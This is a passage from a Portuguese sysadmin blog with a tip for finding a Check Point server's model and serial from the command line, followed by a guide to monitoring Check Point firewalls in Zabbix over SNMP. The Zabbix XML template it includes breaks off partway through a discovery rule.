Dead Packets

06/06/2013

Descobrir o modelo de um servidor Check Point

Filed under: checkpoint,dicas e truques — drak @ 9:57 PM

Descobrir o modelo e serial de um servidor que tem SPLAT instalado não é tão fácil quanto deveria ser, mas uma vez aprendido nunca se esquece mais:

dmidecode | egrep 'Prod|erial'

Depois basta comparar com as tabelas existentes no link referências.

Para conseguir o serial no Nokia

clish -c "show asset hardware"

Referências
Find UTM-1 Check Point Appliance model from CLI

Anúncios

12/03/2013

Monitorando Check Point com Zabbix – Parte 2

Filed under: checkpoint,monitoring — drak @ 4:24 PM

Neste artigo iremos importar um template para monitorar firewalls Check Point no Zabbix e validar que a coleta está funcionando.

Não é escopo desse post a instalação do Zabbix mas sim a configuração do SNMP no CheckPoint e a configuração da coleta de dados e exibição de gráficos no Zabbix já instalado, porém é importante lembrar de habilitar o SNMP durante a instalação/compilação do Zabbix.

Este artigo está separado em duas partes, na primeira etapa ativamos o SNMP e agora configuraremos a coleta no Zabbix, caso seu firewall ainda não esteja preparado para fornecer informações via SNMP configure-o.

A princípio vamos definir o que é importante monitorar em um firewall:

  • CPU
  • Memória
  • Tráfego nas interfaces
  • Número de conexões simultâneas

Em específico para um firewall Check Point com SO Secure Platform também é importante monitorar os discos.

Cada um desses itens pode ser esmiuçado para obter mais detalhes, e.g., Memória Real, Swap usada, etc. A proposta aqui é criar um template para coletar todas as informações relevantes para um relatório de tendência de uso do ambiente (capacity) e troubleshooting.

Template Zabbix – CheckPoint SNMP:

<?xml version="1.0" encoding="UTF-8"?>
<zabbix_export>
    <version>2.0</version>
    <date>2013-03-08T17:09:31Z</date>
    <groups>
        <group>
            <name>Templates</name>
        </group>
    </groups>    
	<templates>
        <template>
            <template>Template CheckPoint SNMP</template>
            <name>Template CheckPoint SNMP</name>
            <groups>
                <group>
                    <name>Templates</name>
                </group>
            </groups>
            <applications>
                <application>
                    <name>Check Point General Stats</name>
                </application>
                <application>
                    <name>Connections</name>
                </application>
                <application>
                    <name>CPU</name>
                </application>
                <application>
                    <name>High Availability</name>
                </application>
                <application>
                    <name>Memory</name>
                </application>
                <application>
                    <name>Services</name>
                </application>
                <application>
                    <name>Interfaces</name>
                </application>
                <application>
                    <name>General</name>
                </application>
                <application>
                    <name>Disk partitions</name>
                </application>			
			</applications>
            <items>
                <item>
                    <name>Active real memory</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.4.4.0</snmp_oid>
                    <key>memActiveReal64</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Active total memory</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.4.2.0</snmp_oid>
                    <key>memActiveVirtual64</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Available real memory</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>1</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2021.4.6.0</snmp_oid>
                    <key>memAvailReal</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1024</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Current connections</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.25.3.0</snmp_oid>
                    <key>fwNumConn</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Connections</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Firewall Module State</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.1.0</snmp_oid>
                    <key>fwModuleState</key>
                    <delay>900</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Firewall Policy Install Time</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.25.2.0</snmp_oid>
                    <key>fwInstallTime</key>
                    <delay>900</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase>{$SNMP_AUTH}</snmpv3_authpassphrase>
                    <snmpv3_privpassphrase>{$SNMP_PRIV}</snmpv3_privpassphrase>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Hardware Uptime</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>1</multiplier>
                    <snmp_oid>1.3.6.1.2.1.25.1.1.0</snmp_oid>
                    <key>hrSystemUptime</key>
                    <delay>60</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>uptime</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>0.01</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>High Availability Mode</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.5.11.0</snmp_oid>
                    <key>haWorkMode</key>
                    <delay>900</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>High Availability</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>High Availability State</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.5.6.0</snmp_oid>
                    <key>haState</key>
                    <delay>900</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>High Availability</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>ICMP ping response time</name>
                    <type>3</type>
                    <snmp_community/>
                    <multiplier>0</multiplier>
                    <snmp_oid/>
                    <key>icmppingsec</key>
                    <delay>60</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>0</value_type>
                    <allowed_hosts/>
                    <units>s</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Services</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>OS Name</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.5.1.0</snmp_oid>
                    <key>osName</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>5</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Peak number of connections</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.25.4.0</snmp_oid>
                    <key>fwPeakNumConn</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Connections</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Processor system time</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.2.2.0</snmp_oid>
                    <key>procSysTime</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>%</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>CPU</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Processor usage</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.2.4.0</snmp_oid>
                    <key>procUsage</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>%</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>CPU</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Processor user time</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.2.1.0</snmp_oid>
                    <key>procUsrTime</key>
                    <delay>10</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>%</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>CPU</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Product Name</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.1.10.0</snmp_oid>
                    <key>fwProduct</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>1</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Product Version</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.4.1.0</snmp_oid>
                    <key>svnVersion</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>4</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>6</inventory_link>
                    <applications>
                        <application>
                            <name>Check Point General Stats</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Real used memory</name>
                    <type>15</type>
                    <snmp_community/>
                    <multiplier>0</multiplier>
                    <snmp_oid/>
                    <key>memUsedReal64</key>
                    <delay>30</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>bytes</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params>memTotalReal64-memFreeReal64</params>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>SSH service is running</name>
                    <type>3</type>
                    <snmp_community/>
                    <multiplier>0</multiplier>
                    <snmp_oid/>
                    <key>net.tcp.service[ssh]</key>
                    <delay>60</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Services</name>
                        </application>
                    </applications>
                    <valuemap>
                        <name>Service state</name>
                    </valuemap>
                </item>
                <item>
                    <name>Total memory (real + swap)</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2620.1.6.7.4.1.0</snmp_oid>
                    <key>memTotalVirtual64</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Total real memory</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>1</multiplier>
                    <snmp_oid>1.3.6.1.4.1.2021.4.5.0</snmp_oid>
                    <key>memTotalReal</key>
                    <delay>3600</delay>
                    <history>90</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>B</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1024</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description/>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Memory</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Number of network interfaces</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>IF-MIB::ifNumber.0</snmp_oid>
                    <key>ifNumber</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>The number of network interfaces (regardless of their current state) present on this system.</description>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>Interfaces</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>            
                <item>
                    <name>Device contact details</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysContact.0</snmp_oid>
                    <key>sysContact</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>1</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>The textual identification of the contact person for this managed node, together with information on how to contact this person.  If no contact information is known, the value is the zero-length string.</description>
                    <inventory_link>23</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Device description</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysDescr.0</snmp_oid>
                    <key>sysDescr</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>1</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>A textual description of the entity.  This value should include the full name and version identification of the system's hardware type, software operating-system, and networking software.</description>
                    <inventory_link>14</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Device location</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysLocation.0</snmp_oid>
                    <key>sysLocation</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>1</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>The physical location of this node (e.g., `telephone closet, 3rd floor').  If the location is unknown, the value is the zero-length string.</description>
                    <inventory_link>24</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Device name</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>0</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysName.0</snmp_oid>
                    <key>sysName</key>
                    <delay>3600</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>1</value_type>
                    <allowed_hosts/>
                    <units/>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>1</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>An administratively-assigned name for this managed node. By convention, this is the node's fully-qualified domain name.  If the name is unknown, the value is the zero-length string.</description>
                    <inventory_link>3</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>
                <item>
                    <name>Device uptime</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <multiplier>1</multiplier>
                    <snmp_oid>SNMPv2-MIB::sysUpTime.0</snmp_oid>
                    <key>sysUpTime</key>
                    <delay>60</delay>
                    <history>7</history>
                    <trends>365</trends>
                    <status>0</status>
                    <value_type>3</value_type>
                    <allowed_hosts/>
                    <units>uptime</units>
                    <delta>0</delta>
                    <snmpv3_securityname/>
                    <snmpv3_securitylevel>0</snmpv3_securitylevel>
                    <snmpv3_authpassphrase/>
                    <snmpv3_privpassphrase/>
                    <formula>0.01</formula>
                    <delay_flex/>
                    <params/>
                    <ipmi_sensor/>
                    <data_type>0</data_type>
                    <authtype>0</authtype>
                    <username/>
                    <password/>
                    <publickey/>
                    <privatekey/>
                    <port/>
                    <description>The time since the network management portion of the system was last re-initialized.</description>
                    <inventory_link>0</inventory_link>
                    <applications>
                        <application>
                            <name>General</name>
                        </application>
                    </applications>
                    <valuemap/>
                </item>			
			</items>
            <discovery_rules>
                <discovery_rule>
                    <name>HA Status</name>
                    <type>4</type>
                    <snmp_community>{$SNMP_COMMUNITY}</snmp_community>
                    <snmp_oid>CHECKPOINT-MIB::haProblemName</snmp_oid>
                    <key>haProblemName</key>
                    <delay>240</delay>
                    <status>0</status>
                    <allowed_hosts/>
                    <snmpv3_securityname>{$SNMP_SECNAME}</snmpv3_securityname>
                    <snmpv3_securitylevel>2</snmpv3_securitylevel>
